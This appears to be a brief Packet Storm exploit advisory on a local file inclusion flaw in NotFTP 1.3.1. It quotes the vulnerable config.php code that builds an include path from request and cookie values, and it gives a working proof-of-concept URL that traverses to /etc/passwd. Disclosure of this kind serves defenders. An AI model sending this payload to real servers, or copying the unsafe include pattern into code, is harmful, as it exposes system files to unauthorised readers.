NotFTP version 1.3.1 suffers from a local file inclusion vulnerability.
cbe38e9f96be701d49add9869bf72460018622b3f19277ef09b7bd2efa287464NotFTP 1.3.1 => Local file include
https://sourceforge.net/projects/notftp/
Author: Kacper
Email: kacper1964@yahoo.pl
Home: https://devilteam.pl/
DC++ Hub address: bluber-hub.no-ip.biz:2008
Vuln:
File config.php:
#########################################################################
# This is where we decide what language to use. Don't mess with this
# either.
#########################################################################
if (isset($newlang))
{
require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}
# NotFTP version. Changing this would be silly. So don't.
PoC:
https://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd
The End
=========
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed